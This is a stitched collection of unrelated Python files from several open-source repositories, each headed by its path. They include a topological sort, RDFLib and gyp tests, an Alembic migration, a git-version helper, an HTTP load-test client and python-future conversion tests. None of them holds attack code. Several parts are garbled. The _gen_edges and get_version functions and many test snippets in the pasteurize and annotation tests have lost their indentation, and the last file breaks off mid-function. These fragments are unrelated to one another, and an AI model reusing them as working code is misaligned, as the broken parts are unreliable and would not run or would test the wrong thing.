    """sort the given list of items by dependency.

    'tuples' is a list of tuples representing a partial ordering.
    Yields items one at a time, flattening the subset levels produced
    by sort_as_subsets.
    """
    for ready_level in sort_as_subsets(tuples, allitems):
        for item in ready_level:
            yield item
def find_cycles(tuples, allitems):
    """Return the set of nodes participating in any dependency cycle.

    Iterative DFS from every node with outgoing edges; when the walk
    reaches a node already on the stack, the stack slice from that node
    onward is a cycle.
    """
    # edges[parent] = set of children reachable in one step.
    edges = util.defaultdict(set)
    for parent, child in tuples:
        edges[parent].add(child)
    nodes_to_test = set(edges)

    output = set()

    for node in nodes_to_test:
        stack = [node]
        todo = nodes_to_test.difference(stack)
        while stack:
            top = stack[-1]
            for node in edges[top]:
                if node in stack:
                    # Back-edge found: everything from the first
                    # occurrence of node to the stack top is cyclic.
                    cyc = stack[stack.index(node):]
                    todo.difference_update(cyc)
                    output.update(cyc)

                if node in todo:
                    stack.append(node)
                    todo.remove(node)
                    break
            else:
                # No unvisited child: retreat one level.
                node = stack.pop()
    return output
def _gen_edges(edges):
return set([
(right, left)
for left in edges
for right in edges[left]
])
|
data/RDFLib/rdflib/test/test_graph_formula.py
|
import sys
import os
from tempfile import mkdtemp, mkstemp
from rdflib import RDF, RDFS, URIRef, BNode, Variable, plugin
from rdflib.graph import QuotedGraph, ConjunctiveGraph
# BUG FIX: a bad extraction stripped everything from '#' to end-of-line,
# leaving an unterminated string literal here and truncated namespace
# prefixes in testN3. Restored the canonical URIs.
# Predicate for N3 log implication ({antecedent} => {consequent}).
implies = URIRef("http://www.w3.org/2000/10/swap/log#implies")

# Small N3 document with one implication rule, used by the tests below.
testN3 = """
@prefix rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#> .
@prefix rdfs: <http://www.w3.org/2000/01/rdf-schema#> .
@prefix : <http://test/> .
{:a :b :c;a :foo} => {:a :d :c,?y}.
_:foo a rdfs:Class.
:a :d :c."""
from nose.tools import nottest
from nose.exc import SkipTest
@nottest
def testFormulaStore(store="default", configString=None):
    """Exercise formula-aware (N3 quoted-graph) behaviour of *store*.

    Parses testN3 and asserts triple counts and variable handling in the
    implication's antecedent/consequent formulae and in the universe
    graph; finally tears the store down.
    """
    try:
        g = ConjunctiveGraph(store=store)
    except ImportError:
        raise SkipTest("Dependencies for store '%s' not available!" % store)

    if configString:
        # Persistent store: wipe any leftovers, then open with the config.
        g.destroy(configString)
        g.open(configString)
    else:
        if store == 'SQLite':
            _, path = mkstemp(prefix='test', dir='/tmp', suffix='.sqlite')
            g.open(path, create=True)
        else:
            g.open(mkdtemp(), create=True)

    g.parse(data=testN3, format="n3")

    try:
        # Grab the two quoted graphs on either side of the => rule.
        for s, p, o in g.triples((None, implies, None)):
            formulaA = s
            formulaB = o

        assert type(formulaA) == QuotedGraph and type(formulaB) == QuotedGraph
        b = URIRef('http://test/b')
        c = URIRef('http://test/c')
        d = URIRef('http://test/d')
        v = Variable('y')

        universe = ConjunctiveGraph(g.store)

        # test formula as terms
        assert len(list(universe.triples((formulaA, implies, formulaB)))) == 1

        # test variable as term and variable roundtrip
        assert len(list(formulaB.triples((None, None, v)))) == 1
        for s, p, o in formulaB.triples((None, d, None)):
            if o != c:
                assert isinstance(o, Variable)
                assert o == v
        s = list(universe.subjects(RDF.type, RDFS.Class))[0]
        assert isinstance(s, BNode)
        assert len(list(universe.triples((None, implies, None)))) == 1
        assert len(list(universe.triples((None, RDF.type, None)))) == 1
        assert len(list(formulaA.triples((None, RDF.type, None)))) == 1
        assert len(list(formulaA.triples((None, None, None)))) == 2
        assert len(list(formulaB.triples((None, None, None)))) == 2
        assert len(list(universe.triples((None, None, None)))) == 3
        assert len(list(formulaB.triples(
            (None, URIRef('http://test/d'), None)))) == 2
        assert len(list(universe.triples(
            (None, URIRef('http://test/d'), None)))) == 1

        # context tests
        # test contexts with triple argument
        universe.remove((None, implies, None))
        assert len(list(universe.triples((None, implies, None)))) == 0
        assert len(list(formulaA.triples((None, None, None)))) == 2
        assert len(list(formulaB.triples((None, None, None)))) == 2

        formulaA.remove((None, b, None))
        assert len(list(formulaA.triples((None, None, None)))) == 1
        formulaA.remove((None, RDF.type, None))
        assert len(list(formulaA.triples((None, None, None)))) == 0

        universe.remove((None, RDF.type, RDFS.Class))

        # test removal of universe quantified
        universe.remove_context(formulaB)
        assert len(list(universe.triples((None, RDF.type, None)))) == 0
        assert len(universe) == 1
        assert len(formulaB) == 0

        universe.remove((None, None, None))
        assert len(universe) == 0

        g.close()
        if store == 'SQLite':
            os.unlink(path)
        else:
            g.store.destroy(configString)
    except:
        # Same teardown on failure, then re-raise for the test runner.
        g.close()
        if store == 'SQLite':
            os.unlink(path)
        else:
            g.store.destroy(configString)
        raise
def testFormulaStores():
    """Nose generator: yield one formula-store test per eligible plugin."""
    pluginname = None
    # Only honour a command-line plugin filter when run as a script.
    if __name__ == '__main__':
        if len(sys.argv) > 1:
            pluginname = sys.argv[1]

    for s in plugin.plugins(pluginname, plugin.Store):
        if s.name in (
                'Auditable', 'Concurrent',
                'SPARQLStore', 'SPARQLUpdateStore',
        ):
            # Wrapper/remote stores are not exercised here.
            continue
        if not s.getClass().formula_aware:
            continue
        yield testFormulaStore, s.name
# Run the generated tests through nose when invoked directly.
if __name__ == '__main__':
    import nose
    nose.main(defaultTest=sys.argv[0])
|
data/adblockplus/gyp/test/win/gyptest-cl-function-level-linking.py
|
"""
Make sure function-level linking setting is extracted properly.
"""
import TestGyp
import sys
# Windows-only: verifies that the /Gy (function-level linking) compiler
# flag is propagated, by checking for COMDAT sections in the object files.
if sys.platform == 'win32':
    test = TestGyp.TestGyp(formats=['msvs', 'ninja'])

    CHDIR = 'compiler-flags'
    test.run_gyp('function-level-linking.gyp', chdir=CHDIR)
    test.build('function-level-linking.gyp', test.ALL, chdir=CHDIR)

    def CheckForSectionString(binary, search_for, should_exist):
        # Scan dumpbin /headers output for the given marker string.
        output = test.run_dumpbin('/headers', binary)
        if should_exist and search_for not in output:
            print 'Did not find "%s" in %s' % (search_for, binary)
            test.fail_test()
        elif not should_exist and search_for in output:
            print 'Found "%s" in %s (and shouldn\'t have)' % (search_for, binary)
            test.fail_test()

    def Object(proj, obj):
        # ninja separates project/object with '.', msvs with a backslash.
        sep = '.' if test.format == 'ninja' else '\\'
        return 'obj\\%s%s%s' % (proj, sep, obj)

    look_for = '''COMDAT; sym= "int __cdecl comdat_function'''

    # When function-level linking is on, the function should be a COMDAT.
    CheckForSectionString(
        test.built_file_path(Object('test_fll_on', 'function-level-linking.obj'),
                             chdir=CHDIR),
        look_for,
        should_exist=True)

    # When it's off, it shouldn't be.
    CheckForSectionString(
        test.built_file_path(Object('test_fll_off', 'function-level-linking.obj'),
                             chdir=CHDIR),
        look_for,
        should_exist=False)

    test.pass_test()
|
data/SMFOSS/CheesePrism/cheeseprism/event.py
|
from zope.interface import Attribute
from zope.interface import Interface
from zope.interface import implements
class IIndexEvent(Interface):
    """
    A lower-level event involving the index
    """
class IIndexUpdate(Interface):
    """
    A low-level event involving an update of the index
    """
class IPackageEvent(IIndexEvent):
    """
    An event involving a package
    """
    path = Attribute('Path to package')
class IPackageAdded(IPackageEvent):
    """
    A package is added to the repository
    """
class IPackageRemoved(IPackageEvent):
    """
    A package is removed from the repository
    """
class IndexEvent(object):
    """Concrete base event carrying the index and the datafile involved."""
    implements(IIndexEvent)

    def __init__(self, datafile, index):
        self.index = index
        self.datafile = datafile
class IndexUpdate(IndexEvent):
    """Event fired when the index is updated."""
    implements(IIndexUpdate)
class PackageEvent(object):
    """
    Base class for package events
    """
    implements(IPackageEvent)

    def __init__(self, index_manager, path=None, name=None, version=None):
        self.name = name
        self.version = version
        self.im = index_manager
        self.path = path
        # When no explicit name is given but a path is, derive name/version
        # from the package file's metadata via the index manager.
        if self.name is None and self.path:
            info = self.im.pkginfo_from_file(path, self.im.move_on_error)
            self.name = info.name
            self.version = info.version
class PackageAdded(PackageEvent):
    """Event fired when a package is added to the repository."""
    implements(IPackageAdded)
class PackageRemoved(PackageEvent):
    """Event fired when a package is removed from the repository."""
    implements(IPackageRemoved)
|
data/Net-ng/kansha/kansha/alembic/versions/b740362087_adding_max_cards.py
|
"""adding max cards
Revision ID: b740362087
Revises: 537fa16b46e7
Create Date: 2013-09-19 17:37:37.027495
"""
# Alembic revision identifiers, used by the migration machinery.
revision = 'b740362087'
down_revision = '537fa16b46e7'
from alembic import op
import sqlalchemy as sa
def upgrade():
    """Add the nullable ``nb_max_cards`` integer column to the ``column`` table."""
    op.add_column('column', sa.Column('nb_max_cards', sa.Integer))
def downgrade():
    """Revert the migration by dropping ``nb_max_cards`` again."""
    op.drop_column('column', 'nb_max_cards')
|
data/accumulo/pyaccumulo/version.py
|
# __all__ must be a sequence of names.  The original ("get_git_version")
# lacked a trailing comma, so it was just a parenthesized *string*, which
# makes ``from version import *`` iterate over individual characters.
__all__ = ("get_git_version",)
import os
import sys
import traceback
from subprocess import Popen, PIPE
def call_git_describe(abbrev=4):
    """Return a ``(version, short_source_hash)`` pair derived from
    ``git describe`` and ``git rev-parse HEAD``, or ``(None, None)`` when
    there is no .git directory or any git invocation fails.

    abbrev: number of hash characters to keep in the returned short hash.
    """
    dot_git = os.path.join(
        os.path.dirname(os.path.abspath(__file__)),
        '.git')
    if not os.path.exists(dot_git):
        return None, None
    line = None
    p = None
    try:
        p = Popen(['git', 'describe', '--abbrev=%d' % abbrev],
                  stdout=PIPE, stderr=PIPE,
                  cwd=os.path.dirname(os.path.abspath(__file__)))
        p.stderr.close()
        describe_line = p.stdout.readlines()[0].strip()
        # NOTE(review): this second Popen runs in the process cwd, not next
        # to __file__ like the first one -- confirm that is intended.
        p = Popen(['git', 'rev-parse', 'HEAD'],
                  stdout=PIPE, stderr=PIPE)
        p.stderr.close()
        source_hash = p.stdout.readlines()[0].strip()
        source_hash = source_hash[:abbrev]
        parts = describe_line.split('-')
        if len(parts) == 1:
            # Exactly on a tag: describe printed just the version.
            version = parts[0]
        else:
            # "<tag>-<commits-since>-<hash>": bump the last numeric component
            # and mark as a dev release of the *next* version.
            ver, rel, source_hash = parts
            version_parts = ver.split('.')
            lasti = len(version_parts) - 1
            version_parts[lasti] = str(int(version_parts[lasti]) + 1)
            version = '{}.dev{}'.format('.'.join(version_parts), rel)
        return version, source_hash
    except Exception, exc:
        # Best-effort diagnostics; never let version lookup crash the caller.
        # NOTE(review): 'line' is never assigned after its initialization
        # (describe_line is used instead), so this always logs "line: None".
        sys.stderr.write('line: %r\n' % line)
        sys.stderr.write(traceback.format_exc(exc))
        try:
            sys.stderr.write('p.stderr.read()=%s\n' % p.stderr.read())
        except Exception, exc:
            sys.stderr.write(traceback.format_exc(exc))
        try:
            sys.stderr.write('os.getcwd()=%s\n' % os.getcwd())
        except Exception, exc:
            sys.stderr.write(traceback.format_exc(exc))
        return None, None
def read_release_version():
    """Read the cached version from the RELEASE-VERSION file.

    The file holds one line of the form ``"<version>,<hash>\n"``; the parsed
    ``[version, hash]`` list is returned.  Returns ``(None, None)`` when the
    file is missing, unreadable, or empty (matching the original behavior).
    """
    try:
        # 'with' guarantees the file is closed; the original used a manual
        # try/finally and a bare 'except' that hid unrelated errors.
        with open("RELEASE-VERSION", "r") as f:
            return f.readlines()[0].strip().split(',')
    except (EnvironmentError, IndexError):
        # EnvironmentError: missing/unreadable file; IndexError: empty file.
        return None, None
def write_release_version(version, source_hash):
    """Persist ``"<version>,<source_hash>\n"`` to the RELEASE-VERSION file.

    Uses a context manager so the file is closed (and flushed) even if the
    write raises, unlike the original open/write/close sequence.
    """
    with open("RELEASE-VERSION", "w") as f:
        f.write("%s,%s\n" % (version, source_hash))
def get_git_version(abbrev=4):
    """Return ``(version, source_hash)``, preferring live git metadata.

    Falls back to the cached RELEASE-VERSION contents when git is
    unavailable, and to ``('0.0.0', '')`` when neither source works.
    The cache file is rewritten whenever the result differs from it.
    """
    cached_version, cached_hash = read_release_version()

    version, source_hash = call_git_describe(abbrev)
    if version is None:
        version, source_hash = cached_version, cached_hash
    if version is None:
        version, source_hash = '0.0.0', ''

    if (version, source_hash) != (cached_version, cached_hash):
        write_release_version(version, source_hash)

    return version, source_hash
# Print the computed (version, hash) when the module is run directly.
if __name__ == "__main__":
    print get_git_version()
|
data/JeremyGrosser/supervisor/src/supervisor/medusa/test/test_11.py
|
import socket
import string
from supervisor.medusa import asyncore_25 as asyncore
from supervisor.medusa import asynchat_25 as asynchat
class test_client (asynchat.async_chat):
    """Async HTTP load-test client that pushes a pre-built request chain
    and tallies bytes received across all instances."""

    ac_in_buffer_size = 16384
    ac_out_buffer_size = 16384

    # Class-level counters shared by every client instance.
    total_in = 0
    concurrent = 0
    max_concurrent = 0

    def __init__ (self, addr, chain):
        asynchat.async_chat.__init__ (self)
        self.create_socket (socket.AF_INET, socket.SOCK_STREAM)
        # Responses are delimited by a blank line (end of HTTP headers).
        self.set_terminator ('\r\n\r\n')
        self.connect (addr)
        self.push (chain)

    def handle_connect (self):
        # Track the high-water mark of simultaneously open connections.
        test_client.concurrent = test_client.concurrent + 1
        if (test_client.concurrent > test_client.max_concurrent):
            test_client.max_concurrent = test_client.concurrent

    def handle_expt (self):
        print 'unexpected FD_EXPT thrown. closing()'
        self.close()

    def close (self):
        test_client.concurrent = test_client.concurrent - 1
        asynchat.async_chat.close(self)

    def collect_incoming_data (self, data):
        # Only the byte count matters for the benchmark; data is discarded.
        test_client.total_in = test_client.total_in + len(data)

    def found_terminator (self):
        pass

    def log (self, *args):
        # Silence asyncore's default logging.
        pass
import time
class timer:
    """Minimal wall-clock stopwatch that starts at construction time."""

    def __init__(self):
        self.start = time.time()

    def end(self):
        """Return the number of seconds elapsed since construction."""
        now = time.time()
        return now - self.start
def build_request_chain(num, host, request_size):
    """Build a pipelined chain of ``num`` HTTP/1.1 GET requests for
    /test<request_size>.html on ``host``.

    The first num-1 requests are keep-alive; the final request carries
    'Connection: close' so the server terminates the exchange.
    """
    keepalive = 'GET /test%d.html HTTP/1.1\r\nHost: %s\r\n\r\n' % (
        request_size, host
    )
    closing = 'GET /test%d.html HTTP/1.1\r\nHost: %s\r\nConnection: close\r\n\r\n' % (
        request_size, host
    )
    # str.join replaces the Python-2-only string.join() (removed in Py3);
    # the produced bytes are identical.
    return ''.join([keepalive] * (num - 1) + [closing])
if __name__ == '__main__':
    import string
    import sys
    if len(sys.argv) != 6:
        print 'usage: %s <host> <port> <request-size> <num-requests> <num-connections>\n' % sys.argv[0]
    else:
        host = sys.argv[1]
        ip = socket.gethostbyname (host)
        # All four numeric arguments are parsed with Python 2's string.atoi.
        [port, request_size, num_requests, num_conns] = map (
            string.atoi, sys.argv[2:]
            )
        chain = build_request_chain (num_requests, host, request_size)
        t = timer()
        # Open num_conns concurrent connections, each pipelining the chain.
        for i in range (num_conns):
            test_client ((host,port), chain)
        asyncore.loop()
        total_time = t.end()
        # Aggregate statistics gathered on the test_client class attributes.
        total_bytes = test_client.total_in
        num_trans = num_requests * num_conns
        throughput = float (total_bytes) / total_time
        trans_per_sec = num_trans / total_time
        sys.stderr.write ('total time: %.2f\n' % total_time)
        sys.stderr.write ('number of transactions: %d\n' % num_trans)
        sys.stderr.write ('total bytes sent: %d\n' % total_bytes)
        sys.stderr.write ('total throughput (bytes/sec): %.2f\n' % throughput)
        sys.stderr.write ('transactions/second: %.2f\n' % trans_per_sec)
        sys.stderr.write ('max concurrent connections: %d\n' % test_client.max_concurrent)
        # Machine-readable CSV summary goes to stdout.
        sys.stdout.write (
            string.join (
                map (str, (num_conns, num_requests, request_size, throughput, trans_per_sec)),
                ','
            ) + '\n'
        )
|
data/Immediatic/cmsplugin_vimeo/cmsplugin_vimeo/__init__.py
|
VERSION = (0,1,0,'final',1)
__version__ = '.'.join(map(str, VERSION))
def get_version():
version = '%s.%s' % (VERSION[0], VERSION[1])
if VERSION[2]:
version = '%s.%s' % (version, VERSION[2])
if VERSION[3:] == ('alpha', 0):
version = '%s pre-alpha' % version
else:
if VERSION[3] != 'final':
version = '%s %s %s' % (version, VERSION[3], VERSION[4])
return version
|
data/PythonCharmers/python-future/tests/test_future/test_pasteurize.py
|
"""
This module contains snippets of Python 3 code (invalid Python 2) and
tests for whether they can be passed to ``pasteurize`` and
immediately run under both Python 2 and Python 3.
"""
from __future__ import print_function, absolute_import
import pprint
from subprocess import Popen, PIPE
import tempfile
import os
from future.tests.base import CodeHandler, unittest, skip26
class TestPasteurize(CodeHandler):
    """
    After running ``pasteurize``, these Python 3 code snippets should run
    on both Py3 and Py2.
    """

    def setUp(self):
        # mkstemp returns (fd, path); the fd is intentionally discarded.
        _, self.textfilename = tempfile.mkstemp(text=True)
        super(TestPasteurize, self).setUp()

    def tearDown(self):
        os.unlink(self.textfilename)

    @skip26
    def test_range_slice(self):
        """
        After running ``pasteurize``, this Python 3 code should run
        quickly on both Py3 and Py2 without a MemoryError
        """
        code = '''
for i in range(10**8)[:10]:
pass
'''
        self.unchanged(code, from3=True)

    def test_print(self):
        """
        This Python 3-only code is a SyntaxError on Py2 without the
        print_function import from __future__.
        """
        code = '''
import sys
print('Hello', file=sys.stderr)
'''
        self.unchanged(code, from3=True)

    def test_division(self):
        """
        True division should not be screwed up by conversion from 3 to both
        """
        code = '''
x = 3 / 2
assert x == 1.5
'''
        self.unchanged(code, from3=True)

    @unittest.expectedFailure
    def test_exception_indentation(self):
        """
        As of v0.11.2, pasteurize broke the indentation of ``raise`` statements
        using with_traceback. Test for this.
        """
        before = '''
import sys
if True:
try:
'string' + 1
except TypeError:
ty, va, tb = sys.exc_info()
raise TypeError("can't do that!").with_traceback(tb)
'''
        after = '''
import sys
from future.utils import raise_with_traceback
if True:
try:
'string' + 1
except TypeError:
ty, va, tb = sys.exc_info()
raise_with_traceback(TypeError("can't do that!"), tb)
'''
        self.convert_check(before, after, from3=True)

    @unittest.expectedFailure
    def test_urllib_request(self):
        """
        Example Python 3 code using the new urllib.request module.
        Does the ``pasteurize`` script handle this?
        """
        before = """
import pprint
import urllib.request
URL = 'http://pypi.python.org/pypi/{}/json'
package = 'future'
r = urllib.request.urlopen(URL.format(package))
pprint.pprint(r.read())
"""
        after = """
import pprint
import future.standard_library.urllib.request as urllib_request
URL = 'http://pypi.python.org/pypi/{}/json'
package = 'future'
r = urllib_request.urlopen(URL.format(package))
pprint.pprint(r.read())
"""
        self.convert_check(before, after, from3=True)

    def test_urllib_refactor2(self):
        # NOTE(review): this test builds 'before'/'after' but never calls
        # self.convert_check(before, after, from3=True), so it currently
        # asserts nothing -- confirm whether that call was dropped by accident.
        before = """
import urllib.request, urllib.parse
f = urllib.request.urlopen(url, timeout=15)
filename = urllib.parse.urlparse(url)[2].split('/')[-1]
"""
        after = """
from future.standard_library.urllib import request as urllib_request
from future.standard_library.urllib import parse as urllib_parse
f = urllib_request.urlopen(url, timeout=15)
filename = urllib_parse.urlparse(url)[2].split('/')[-1]
"""

    def test_correct_exit_status(self):
        """
        Issue
        status code. This is because the status code returned from
        libfuturize.main.main() etc. was a ``newint``, which sys.exit() always
        translates into 1!
        """
        from libpasteurize.main import main
        retcode = main([self.textfilename])
        self.assertTrue(isinstance(retcode, int))
class TestFuturizeAnnotations(CodeHandler):
    """Tests for stripping Python 3 function annotations during conversion."""

    @unittest.expectedFailure
    def test_return_annotations_alone(self):
        before = "def foo() -> 'bar': pass"
        after = """
def foo(): pass
foo.__annotations__ = {'return': 'bar'}
"""
        self.convert_check(before, after, from3=True)

        b = """
def foo() -> "bar":
print "baz"
print "what's next, again?"
"""
        a = """
def foo():
print "baz"
print "what's next, again?"
"""
        self.convert_check(b, a, from3=True)

    @unittest.expectedFailure
    def test_single_param_annotations(self):
        b = "def foo(bar:'baz'): pass"
        a = """
def foo(bar): pass
foo.__annotations__ = {'bar': 'baz'}
"""
        self.convert_check(b, a, from3=True)

        b = """
def foo(bar:"baz"="spam"):
print("what's next, again?")
print("whatever.")
"""
        a = """
def foo(bar="spam"):
print("what's next, again?")
print("whatever.")
foo.__annotations__ = {'bar': 'baz'}
"""
        self.convert_check(b, a, from3=True)

    def test_multiple_param_annotations(self):
        b = "def foo(bar:'spam'=False, baz:'eggs'=True, ham:False='spaghetti'): pass"
        a = "def foo(bar=False, baz=True, ham='spaghetti'): pass"
        self.convert_check(b, a, from3=True)

        b = """
def foo(bar:"spam"=False, baz:"eggs"=True, ham:False="spam"):
print("this is filler, just doing a suite")
print("suites require multiple lines.")
"""
        a = """
def foo(bar=False, baz=True, ham="spam"):
print("this is filler, just doing a suite")
print("suites require multiple lines.")
"""
        self.convert_check(b, a, from3=True)

    def test_mixed_annotations(self):
        b = "def foo(bar=False, baz:'eggs'=True, ham:False='spaghetti') -> 'zombies': pass"
        a = "def foo(bar=False, baz=True, ham='spaghetti'): pass"
        self.convert_check(b, a, from3=True)

        b = """
def foo(bar:"spam"=False, baz=True, ham:False="spam") -> 'air':
print("this is filler, just doing a suite")
print("suites require multiple lines.")
"""
        a = """
def foo(bar=False, baz=True, ham="spam"):
print("this is filler, just doing a suite")
print("suites require multiple lines.")
"""
        self.convert_check(b, a, from3=True)

        b = "def foo(bar) -> 'brains': pass"
        a = "def foo(bar): pass"
        self.convert_check(b, a, from3=True)

    def test_functions_unchanged(self):
        s = "def foo(): pass"
        self.unchanged(s, from3=True)

        s = """
def foo():
pass
pass
"""
        self.unchanged(s, from3=True)

        s = """
def foo(bar='baz'):
pass
pass
"""
        self.unchanged(s, from3=True)
# Run this module's unittest suite when executed directly.
if __name__ == '__main__':
    unittest.main()
|
data/Impactstory/total-impact-webapp/test/unit_tests/providers/test_provider.py
|
from totalimpact.providers import provider
from totalimpact.providers.provider import Provider, ProviderFactory
from totalimpactwebapp import app, db
from nose.tools import assert_equals, nottest
from xml.dom import minidom
from test.utils import setup_postgres_for_unittests, teardown_postgres_for_unittests
import simplejson, BeautifulSoup
import os
from sqlalchemy.sql import text
# Directory of canned provider response fixtures, relative to this test file.
sampledir = os.path.join(os.path.split(__file__)[0], "../../../extras/sample_provider_pages/")
class Test_Provider():
    """Unit tests for the provider module's lookup/extraction helpers."""

    TEST_PROVIDER_CONFIG = [
        ("pubmed", { "workers":1 }),
        ("wikipedia", {"workers": 3}),
        ("mendeley", {"workers": 3}),
    ]

    # Canned GitHub-style JSON payload used by the JSON lookup tests.
    TEST_JSON = """{"repository":{"homepage":"","watchers":7,"has_downloads":true,"fork":false,"language":"Java","has_issues":true,"has_wiki":true,"forks":0,"size":4480,"private":false,"created_at":"2008/09/29 04:26:42 -0700","name":"gtd","owner":"egonw","description":"Git-based ToDo tool.","open_issues":2,"url":"https://github.com/egonw/gtd","pushed_at":"2012/02/28 10:21:26 -0800"}}"""

    # NOTE(review): fixture file is read at class-definition time and the
    # handle is never closed explicitly.
    TEST_XML = open(os.path.join(sampledir, "facebook", "metrics")).read()

    def setUp(self):
        self.db = setup_postgres_for_unittests(db, app)

    def tearDown(self):
        teardown_postgres_for_unittests(self.db)

    def test_get_provider(self):
        provider = ProviderFactory.get_provider("wikipedia")
        assert_equals(provider.__class__.__name__, "Wikipedia")

    def test_get_providers(self):
        providers = ProviderFactory.get_providers(self.TEST_PROVIDER_CONFIG)
        provider_names = [provider.__class__.__name__ for provider in providers]
        assert_equals(set(provider_names), set(['Mendeley', 'Wikipedia', "Pubmed"]))

    def test_get_providers_filters_by_metrics(self):
        providers = ProviderFactory.get_providers(self.TEST_PROVIDER_CONFIG, "metrics")
        provider_names = [provider.__class__.__name__ for provider in providers]
        assert_equals(set(provider_names), set(['Mendeley', 'Wikipedia', "Pubmed"]))

    def test_get_providers_filters_by_biblio(self):
        providers = ProviderFactory.get_providers(self.TEST_PROVIDER_CONFIG, "biblio")
        provider_names = [provider.__class__.__name__ for provider in providers]
        assert_equals(set(provider_names), set(['Pubmed', 'Mendeley']))

    def test_get_providers_filters_by_aliases(self):
        providers = ProviderFactory.get_providers(self.TEST_PROVIDER_CONFIG, "aliases")
        provider_names = [provider.__class__.__name__ for provider in providers]
        assert_equals(set(provider_names), set(['Pubmed', 'Mendeley']))

    def test_lookup_json(self):
        page = self.TEST_JSON
        data = simplejson.loads(page)
        response = provider._lookup_json(data, ['repository', 'name'])
        assert_equals(response, u'gtd')

    def test_extract_json(self):
        page = self.TEST_JSON
        dict_of_keylists = {
            'title' : ['repository', 'name'],
            'description' : ['repository', 'description']}
        response = provider._extract_from_json(page, dict_of_keylists)
        assert_equals(response, {'description': u'Git-based ToDo tool.', 'title': u'gtd'})

    def test_lookup_xml_from_dom(self):
        page = self.TEST_XML
        doc = minidom.parseString(page.strip())
        response = provider._lookup_xml_from_dom(doc, ['total_count'])
        assert_equals(response, 17)

    def test_lookup_xml_from_soup(self):
        page = self.TEST_XML
        doc = BeautifulSoup.BeautifulStoneSoup(page)
        response = provider._lookup_xml_from_soup(doc, ['total_count'])
        assert_equals(response, 17)

    def test_extract_xml(self):
        page = self.TEST_XML
        dict_of_keylists = {
            'count' : ['total_count']}
        response = provider._extract_from_xml(page, dict_of_keylists)
        assert_equals(response, {'count': 17})

    def test_doi_from_url_string(self):
        test_url = "https://knb.ecoinformatics.org/knb/d1/mn/v1/object/doi:10.5063%2FAA%2Fnrs.373.1"
        expected = "10.5063/AA/nrs.373.1"
        response = provider.doi_from_url_string(test_url)
        assert_equals(response, expected)

    def test_is_issn_in_doaj_false(self):
        response = provider.is_issn_in_doaj("invalidissn")
        assert_equals(response, False)

    def test_is_issn_in_doaj_true(self):
        zookeys_issn = "13132989"
        response = provider.is_issn_in_doaj(zookeys_issn)
        assert_equals(response, True)

    def test_import_products(self):
        response = provider.import_products("product_id_strings",
            {"product_id_strings": ["123456", "HTTPS://starbucks.com", "arXiv:1305.3328", "http://doi.org/10.123/ABC"]})
        expected = [('pmid', '123456'), ('url', 'HTTPS://starbucks.com'), ('arxiv', '1305.3328'), ('doi', '10.123/abc')]
        assert_equals(response, expected)

    def test_import_products_bad_providername(self):
        response = provider.import_products("nonexistant", {})
        expected = []
        assert_equals(response, expected)
class TestProviderFactory():
    """Tests for ProviderFactory's aggregate metadata accessors."""

    TEST_PROVIDER_CONFIG = [
        ("pubmed", { "workers":1 }),
        ("wikipedia", {"workers": 3}),
        ("mendeley", {"workers": 3}),
    ]

    def test_get_all_static_meta(self):
        sm = ProviderFactory.get_all_static_meta(self.TEST_PROVIDER_CONFIG)
        expected = 'The number of citations by papers in PubMed Central'
        assert_equals(sm["pubmed:pmc_citations"]["description"], expected)

    def test_get_all_metric_names(self):
        response = ProviderFactory.get_all_metric_names(self.TEST_PROVIDER_CONFIG)
        expected = ['wikipedia:mentions', 'mendeley:country', 'pubmed:pmc_citations_reviews', 'mendeley:discipline', 'pubmed:f1000', 'mendeley:career_stage', 'pubmed:pmc_citations_editorials', 'mendeley:readers', 'pubmed:pmc_citations', 'mendeley:groups']
        assert_equals(response, expected)

    def test_get_all_metadata(self):
        md = ProviderFactory.get_all_metadata(self.TEST_PROVIDER_CONFIG)
        print md["pubmed"]
        assert_equals(md["pubmed"]['url'], 'http://pubmed.gov')
|
data/adblockplus/gyp/test/msvs/express/gyptest-express.py
|
"""
Verifies that flat solutions get generated for Express versions of
Visual Studio.
"""

import TestGyp

test = TestGyp.TestGyp(formats=['msvs'])

# Full VS versions must emit '(base)' in the solution; presumably this marks
# the nested (foldered) layout -- verify against the gyp msvs generator.
test.run_gyp('express.gyp', '-G', 'msvs_version=2005')
test.must_contain('express.sln', '(base)')

test.run_gyp('express.gyp', '-G', 'msvs_version=2008')
test.must_contain('express.sln', '(base)')

# Express editions ('e' suffix) must produce solutions without that marker.
test.run_gyp('express.gyp', '-G', 'msvs_version=2005e')
test.must_not_contain('express.sln', '(base)')

test.run_gyp('express.gyp', '-G', 'msvs_version=2008e')
test.must_not_contain('express.sln', '(base)')

test.pass_test()
|
data/adblockplus/gyp/test/hard_dependency/gyptest-exported-hard-dependency.py
|
"""
Verify that a hard_dependency that is exported is pulled in as a dependency
for a target if the target is a static library and if the generator will
remove dependencies between static libraries.
"""

import TestGyp

test = TestGyp.TestGyp()

if test.format == 'dump_dependency_json':
    test.skip_test('Skipping test; dependency JSON does not adjust ' \
                   'static libraries.\n')

test.run_gyp('hard_dependency.gyp', chdir='src')

chdir = 'relocate/src'
test.relocate('src', chdir)

test.build('hard_dependency.gyp', 'c', chdir=chdir)

# Building only 'c' must also produce its exported hard dependency 'a',
# while the unrelated libraries 'b' and 'd' stay unbuilt.
test.built_file_must_exist('a', type=test.STATIC_LIB, chdir=chdir)
test.built_file_must_not_exist('b', type=test.STATIC_LIB, chdir=chdir)
test.built_file_must_exist('c', type=test.STATIC_LIB, chdir=chdir)
test.built_file_must_not_exist('d', type=test.STATIC_LIB, chdir=chdir)

test.pass_test()
|
data/ReactiveX/RxPY/rx/linq/observable/blocking/toiterable.py
|
import threading
from rx.blockingobservable import BlockingObservable
from rx.internal import extensionmethod
from rx.internal.enumerator import Enumerator
@extensionmethod(BlockingObservable)
def to_iterable(self):
    """Returns an iterator that can iterate over items emitted by this
    `BlockingObservable`.

    :returns: An iterator that can iterate over the items emitted by this
    `BlockingObservable`.
    :rtype: Iterable[Any]
    """
    condition = threading.Condition()
    notifications = []

    def on_next(value):
        """Takes on_next values and appends them to the notification queue"""
        # 'with' guarantees release even if notify() raises.
        with condition:
            notifications.append(value)
            condition.notify()

    self.observable.materialize().subscribe(on_next)

    def gen():
        """Generator producing values for the iterator"""
        while True:
            with condition:
                while not len(notifications):
                    condition.wait()
                notification = notifications.pop(0)
            # Bug fix: the original returned/raised on the "E"/"C" branches
            # while still holding the lock (condition.release() was only
            # reached on the value path), leaking the lock on completion,
            # on error, and on any exception.  The 'with' block above now
            # releases before we raise, return, or yield.
            if notification.kind == "E":
                raise notification.exception

            if notification.kind == "C":
